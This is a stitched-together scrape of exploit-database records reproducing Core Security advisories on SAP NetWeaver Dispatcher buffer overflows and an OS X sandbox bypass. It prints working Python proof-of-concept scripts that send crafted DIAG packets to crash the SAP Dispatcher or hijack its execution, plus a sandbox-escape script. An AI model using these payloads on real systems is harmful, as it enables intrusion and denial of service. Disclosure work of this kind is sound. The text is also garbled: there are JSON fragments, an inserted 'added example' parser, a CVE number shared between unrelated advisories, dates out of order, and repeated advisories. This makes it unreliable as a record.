CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2012 Core Security\r\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n\r\n14. 
*PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n ", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72871"}, {"lastseen": "2017-11-19T14:29:11", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "sap netweaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2511", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2514", "CVE-2012-2611", "CVE-2012-2612"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-74568", "id": "SSV:74568", "sourceData": "\n 1. Advisory Information\r\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\r\nAdvisory ID: CORE-2012-0123\r\nAdvisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\r\nDate published: 2012-05-08\r\nDate of last update: 2012-05-10\r\nVendors contacted: SAP\r\nRelease mode: Coordinated release\r\n\r\n2. Vulnerability Information\r\nClass: Buffer overflow [CWE-119]\r\nImpact: Code execution, Denial of service\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2012-2611, CVE-2012-2612, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514\r\n\r\n3. Vulnerability Description\r\nSAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. 
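The following is an added example and not code from the advisory or from Core Security. It is a Python 3 walker for the DIAG item framing that the section 8 script relies on (a 1-byte item type; for type 0x10 a 1-byte id, a 1-byte sid and a 2-byte big-endian length; for type 0x12 the same header with a 4-byte length; type 0x0c ends the message), and it applies the check that the trace functions in 'disp+work.exe' evidently did not: the declared item length is clamped to the bytes actually present and any over-declaration is reported instead of being read past the buffer. The names APPL, APPL4 and EOM, the restriction to those three item kinds, and the reconstruction of the section 8.5 message with a length field of 0x000a (the published text reads "\0a") are assumptions of this example, not statements from the advisory. Run over the six section 8 trigger messages, it shows that the DiagTraceHex and DiagTraceStreamI messages declare far more payload than they carry (0xffffffff and 0x00ff bytes against 6 and 4 present), while the other four are length-consistent, so a framing-level length check alone would not have caught them; in those cases the defect lies in how the trace functions handle the item content, which the advisory does not detail.

```python
"""SAP DIAG item walker with the bounds check the vulnerable trace code lacked.

Added example, not code from the Core Security advisory. Item names
(APPL, APPL4, EOM) and the three supported item kinds are assumptions
taken from the advisory's section 8 script, not from SAP documentation.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

APPL, APPL4, EOM = 0x10, 0x12, 0x0C
DIAG_HEADER = b"\x00\x00\x00\x00\x00\x00\x00\x00"     # as in the script's send_message()
STEP_ITEM = b"\x10\x04\x26\x00\x04\x00\x00\x00\x01"   # as in the script's send_message()


@dataclass
class DiagItem:
    item_type: int
    item_id: int
    item_sid: int
    declared_len: int
    data: bytes

    @property
    def truncated(self) -> bool:
        """The header promised more bytes than the message actually carries."""
        return len(self.data) < self.declared_len


def build_item(item_type: int, item_id: int, item_sid: int, data: bytes,
               declared_len: Optional[int] = None) -> bytes:
    """Encode one APPL (2-byte length) or APPL4 (4-byte length) item.
    declared_len lets a caller deliberately over-declare, as the PoCs do."""
    n = len(data) if declared_len is None else declared_len
    fmt = "!BBBH" if item_type == APPL else "!BBBI"
    return struct.pack(fmt, item_type, item_id, item_sid, n) + data


def frame_message(item: bytes) -> bytes:
    """Wrap an item the way send_message()/send_packet() do: NI 4-byte
    big-endian length, 8-byte DIAG header, step item, the item, EOM."""
    body = DIAG_HEADER + STEP_ITEM + item + bytes([EOM])
    return struct.pack("!I", len(body)) + body


def parse_items(payload: bytes) -> List[DiagItem]:
    """Walk items up to EOM without ever indexing past the buffer.

    The body slice is clamped to the bytes present and the mismatch is
    kept on the item, so a caller can reject the message instead of
    trusting declared_len the way the vulnerable trace code did.
    """
    items, pos, end = [], 0, len(payload)
    while pos < end:
        t = payload[pos]
        if t == EOM:
            break
        if t == APPL:
            fmt, hdr = "!BBBH", 5
        elif t == APPL4:
            fmt, hdr = "!BBBI", 7
        else:
            raise ValueError("unsupported item type 0x%02x at offset %d" % (t, pos))
        if pos + hdr > end:
            raise ValueError("item header at offset %d runs past the buffer" % pos)
        _, iid, sid, n = struct.unpack_from(fmt, payload, pos)
        body = payload[pos + hdr:pos + hdr + n]   # clamped slice, never an overread
        items.append(DiagItem(t, iid, sid, n, body))
        pos += hdr + len(body)
    return items


def parse_frame(packet: bytes) -> List[DiagItem]:
    """Check the NI length prefix, skip the DIAG header, walk the items."""
    (n,) = struct.unpack("!I", packet[:4])
    if n != len(packet) - 4:
        raise ValueError("NI length %d does not match %d payload bytes" % (n, len(packet) - 4))
    return parse_items(packet[4 + len(DIAG_HEADER):])


def length_mismatches(item_bytes: bytes) -> List[Tuple[int, int, int]]:
    """(item_id, declared_len, bytes_present) for every item that over-declares."""
    return [(i.item_id, i.declared_len, len(i.data))
            for i in parse_items(item_bytes) if i.truncated]


# The six section 8 trigger messages, reconstructed from the advisory.
TRIGGERS = {
    "CVE-2011-1516 DiagTraceR3Info": build_item(APPL, 0x06, 0x20, b"X" * 114 + b"\xff\xff" + b"Y" * 32),
    "CVE-2011-1517 DiagTraceHex": b"\x12\x04\x18\xff\xff\xff\xffCrash!",
    "CVE-2012-2511 DiagTraceAtoms": b"\x12\x09\x02\x00\x00\x00\x08" + b"\x80" * 8,
    "CVE-2012-2512 DiagTraceStreamI": b"\x10\x13\x09\x00\xff\x12\x1a\x59\x51",
    "CVE-2012-2513 Diaginput": b"\x10\x0c\x0e\x00\x0a" + b"A" * 10,   # length 0x000a assumed, see lead-in
    "CVE-2012-2514 DiagiEventSource": b"\x10\x0f\x01\x00\x11" + b"A" * 17,
}

if __name__ == "__main__":
    for name, msg in TRIGGERS.items():
        bad = length_mismatches(msg)
        print("%-32s %s" % (name, "declared/present %s" % bad if bad else "lengths consistent"))
```

`frame_message()` and `parse_frame()` reproduce the NI length prefix, the 8-byte DIAG header and the step item exactly as the advisory's `send_message()` and `send_packet()` build them, so the same walker can be run over captured dispatcher traffic; it assumes that layout, and does not handle the initialization packet, which carries a DP header in front of the DIAG header.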
Errata (2012-05-10 revision of CORE-2012-0123): CVE-2011-1516 changed to
CVE-2012-2611. CVE-2011-1517 changed to CVE-2012-2612.



Apple OS X Sandbox Predefined Profiles Bypass

1. *Advisory Information*

Title: Apple OS X Sandbox Predefined Profiles Bypass
Advisory ID: CORE-2011-0919
Advisory URL: http://www.coresecurity.com/content/apple-osx-sandbox-bypass
Date published: 2011-11-10
Date of last update: 2011-11-10
Vendors contacted: Apple
Release mode: User release


2. *Vulnerability Information*

Class: Access control failure [CWE-264]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516


3. *Vulnerability Description*

Several of the default pre-defined sandbox profiles don't properly
limit all the available mechanisms and therefore allow exercising part
of the restricted functionality. Namely, sending Apple events is
possible within the no-network sandbox (kSBXProfileNoNetwork).
A\r\ncompromised application hypothetically restricted by the use of the\r\nno-network profile may have access to network resources through the\r\nuse of Apple events to invoke the execution of other applications not\r\ndirectly restricted by the sandbox.\r\n\r\nIt is worth mentioning that a similar issue was reported by Charlie\r\nMiller in his talk at Black Hat Japan 2008 [2]. He mentioned a few\r\nprocesses sandboxed by default as well as a method to circumvent the\r\nprotection. Sometime after the talk, Apple modified the mentioned\r\nprofiles by restricting the use of Apple events but did not modify the\r\ngeneric profiles.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . Apple Mac OS X 10.7.x\r\n . Apple Mac OS X 10.6.x\r\n . Apple Mac OS X 10.5.x\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . Apple Mac OS X 10.4\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nContact the vendor for more information.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Anibal Sacco and\r\nMatias Eissler from Core Security Technologies. The publication of\r\nthis advisory was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\nThe use of Apple events is possible within the several default\r\nprofiles as no-network, no-internet (kSBXProfileNoNetwork,\r\nkSBXProfileNoInternet) and others. A compromised application\r\nhypothetically restricted by the use of the no-network profile may\r\nhave access to network resources through the use of Apple events to\r\ninvoke the execution of other applications not directly restricted by\r\nthe sandbox.\r\n\r\nAs Apple's "App Sandbox Design Guide" document points out,\r\napplications that require sending Apple events to other arbitrary\r\napplications are not suitable for sandboxing, because some developer\r\ntools restrict Apple events by default while defining the sandbox. 
The\r\nreason for this is that, as we show here, by dispatching Apple events\r\na process can escape the sandbox [1].\r\n\r\nThe method used by Charlie Miller involves dropping a script to the\r\ndisk and getting it executed by launchd via launchctl. Our approach is\r\ntechnically the same without the need to drop a file. In our PoC we\r\nused "osascript" to send the required Apple events to launchd in order\r\nto execute the new process. As the new process is not a 'child' of the\r\nsandboxed process, it is created without the sandbox restrictions.\r\n\r\nAn additional risk with these profiles is that they are supposed to\r\nprovide an example of how a process should be restricted in different\r\nscenarios. If the no-network profile allows Apple-script events, this\r\nmay result in new applications using the same restriction rules,\r\ntherefore offering a false sense of security.\r\n\r\nThe following PoC illustrates this vulnerability:\r\n\r\n/-----\r\nimport os\r\nimport sys\r\nimport socket\r\n\r\nif len(sys.argv) != 2:\r\n print "[-] Usage: sandbox-exec -n no-network python %s hostname" %\r\nsys.argv[0]\r\n\r\ntry:\r\n targetIP = sys.argv[1]\r\n s = socket.socket()\r\n s.connect((targetIP, 80))\r\n s.send('GET /\\r\\n\\r\\n')\r\n print(s.recv(1024))\r\n print "\\n\\n\\n[+] Sandbox escaped"\r\n\r\nexcept Exception, e:\r\n if "Operation not permitted" in str(e): #print repr(e)\r\n print "[-] Blocked by seatbelt"\r\n print "[ ] Escaping..."\r\n os.system("""/usr/bin/osascript -e 'tell application\r\n"Terminal" to do script "python %s %s"'""" % (sys.argv[0], targetIP))\r\n\r\n- -----/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2011-09-20:\r\nCore Security Technologies notifies Apple Product Security of the\r\nvulnerability, including technical details. Preliminary publication\r\ndate is set to November 7, 2011.\r\n\r\n. 2010-09-20:\r\nVendor acknowledges the receipt of the information.\r\n\r\n. 
2010-10-05:
Vendor informs that it does not see any actual security implications. The kSBXProfileNoNetwork sandbox profile does not promise that Apple Events will be blocked in the documentation. (Specifically, all it guarantees is "all sockets-based networking is prohibited".)

. 2011-10-13:
Core responds that the kSBXProfileNoNetwork sandbox profile should guarantee that "all sockets-based networking is prohibited". The PoC sent to Apple shows that through the use of Apple events (osascript is used in the PoC just to keep it simple) an attacker could circumvent the restriction. So, at the end, sockets-based networking is used.

. 2010-10-18:
Vendor responds that it is currently considering modifying its documentation to explicitly point out what Core described; namely, that the restrictions that these particular sandbox profiles provide are limited to the process in which the sandbox is applied.

. 2011-11-10:
The advisory CORE-2011-0919 is published as user release.


10. *References*

[1] App Sandbox Design Guide -- Designing for App Sandbox
http://developer.apple.com/library/mac/#documentation/Security/Conceptual/AppSandboxDesignGuide/DesigningYourSandbox/DesigningYourSandbox.html

[2] Charlie Miller, "Hacking OS X", Black Hat Japan 2008
https://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-Miller/BlackHat-Japan-08-Miller-Hacking-OSX.pdf


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

CVSS: 7.6 (AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)
Source: https://www.seebug.org/vuldb/ssvid-23189


Exploit Pack record: SAP NetWeaver Dispatcher - Multiple Vulnerabilities
Published: 2012-05-09
CVE: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514
ID: EXPLOITPACK:38C9271832F7D463B695A8339E8E1E4C

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SAP Netweaver Dispatcher Multiple Vulnerabilities


1. *Advisory Information*

Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514


3. *Vulnerability Description*

SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions.
The vulnerabilities are triggered by sending specially crafted SAP Diag packets to remote TCP port 32NN (where NN is the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.


4. *Vulnerable packages*

 . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
 . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
 . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

 . Vendor did not provide this information.


6. *Vendor Information, Solutions and Workarounds*

SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information.

Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:

 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).


7. *Credits*

These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories.


8. *Technical Description / Proof of Concept Code*

*NOTE:* The tracing of 'Dialog processing' has to be at level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512].

The following Python script can be used to reproduce the vulnerabilities described below:

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    # Prefix the payload with its 4-byte big-endian length
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    # Read the 4-byte length prefix, then the payload it announces
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize(sock):
    # Dispatcher (DP) header followed by the Diag connection items
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader+= struct.pack("I", len(diagheader + user_connect + support_data))
    dpheader+= "\x00\xff\xff\xff\xff\xff\xff"
    dpheader+= "terminalXXXXXXX"
    dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    send_packet(sock, dpheader + diagheader + user_connect + support_data)

def send_message(sock, message):
    # Diag header, step item, the message under test and the end-of-message marker
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    send_packet(sock, diagheader + step + message + eom)

# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)
-----/

In the following subsections, we give the Python code that can be added after the script above in order to reproduce all vulnerabilities.


8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*

[CVE-2011-1516] The vulnerability can be triggered when the SAP Netweaver 'disp+work.exe' module processes a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following Python code can be used to trigger the vulnerability:

/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/


8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*

[CVE-2011-1517] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceHex' in 'disp+work.exe'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following Python code can be used to trigger the vulnerability:

/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/


8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*

[CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceAtoms'. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following Python code can be used to trigger the vulnerability:

/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/


8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*

[CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function 'DiagTraceStreamI' and could allow a remote unauthenticated attacker to conduct a denial of service attack.

/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/


8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*

[CVE-2012-2513] The vulnerability can be triggered by the vulnerable function 'Diaginput', allowing a denial of service attack against the vulnerable systems.

/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/

8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*

[CVE-2012-2514] The vulnerability can be triggered by the vulnerable function 'DiagiEventSource' in the 'disp+work.exe' module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.

/-----
crash = "\x10\x0f\x01\x00\x11" + "A"*17
send_message(connection, crash)
-----/


9. *Report Timeline*

. 2012-01-24:
Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012.

. 2012-01-24:
Core sends an advisory draft with technical details.

. 2012-01-24:
The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline.

. 2012-02-01:
The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible.

. 2012-02-21:
First release date missed.

. 2012-02-22:
Core asks for the status of the fix and notifies that the release date was missed.

. 2012-02-23:
SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012.

. 2012-02-23:
Core re-schedules the advisory publication to May 8th.

. 2012-04-16:
Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix.

. 2012-04-16:
Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed.

. 2012-05-04:
Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received).

. 2012-05-07:
Core asks again for the status of the fix.

. 2012-05-08:
SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8].

. 2012-05-08:
Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information.

. 2012-05-08:
Advisory CORE-2012-0123 published.


10. *References*

[1] http://www.sap.com/platform/netweaver/index.epx
[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm
[3] SAP's legal information, terms and conditions
http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46
[4] SAP security note 1687910
https://service.sap.com/sap/support/notes/1687910


13. *Disclaimer*

The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

CVSS: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)


Exploit Pack record: SAP NetWeaver Dispatcher 7.0 ehp12 - Multiple Vulnerabilities
Published: 2012-08-21
CVE: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514, CVE-2012-2611, CVE-2012-2612
ID: EXPLOITPACK:5E02FE625A985E79A644BA6E4CB62E2F

1. Advisory Information
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-10
Vendors contacted: SAP
Release mode: Coordinated release

2. Vulnerability Information
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2012-2611, CVE-2012-2612, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514

3. Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered by sending specially crafted SAP Diag packets to remote TCP port 32NN (where NN is the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.

4. Vulnerable packages
 . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).
 . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).
 . Older versions are probably affected too, but they were not checked.

5. Non-vulnerable packages
 . Vendor did not provide this information.

6. Vendor Information, Solutions and Workarounds
SAP released the security note 1687910 regarding these issues. Contact SAP for further information.

Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:

 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).
 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).

7. Credits
These vulnerabilities were discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Security Advisories Team.

8. Technical Description / Proof of Concept Code
NOTE: The tracing of 'Dialog processing' has to be at level 2 or 3 in order to exploit flaws [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512].

The following Python script can be used to reproduce the vulnerabilities described below:

/-----
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    # Prefix the payload with its 4-byte big-endian length
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

def receive(sock):
    # Read the 4-byte length prefix, then the payload it announces
    length = sock.recv(4)
    (length, ) = struct.unpack("!I", length)
    data = ""
    while len(data)<length:
        data+= sock.recv(length)
    return (length, data)

def initialize(sock):
    # Dispatcher (DP) header followed by the Diag connection items
    diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
    user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
    support_data = "\x10\x04\x0b\x00\x20"
    support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
    support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
    dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
    dpheader+= struct.pack("I", len(diagheader + user_connect + support_data))
    dpheader+= "\x00\xff\xff\xff\xff\xff\xff"
    dpheader+= "terminalXXXXXXX"
    dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    send_packet(sock, dpheader + diagheader + user_connect + support_data)

def send_message(sock, message):
    # Diag header, step item, the message under test and the end-of-message marker
    diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
    step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
    eom = "\x0c"
    send_packet(sock, diagheader + step + message + eom)

# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)

# Choose one of the following and comment the others

#[CVE-2012-2611]
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)

#[CVE-2012-2612]
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
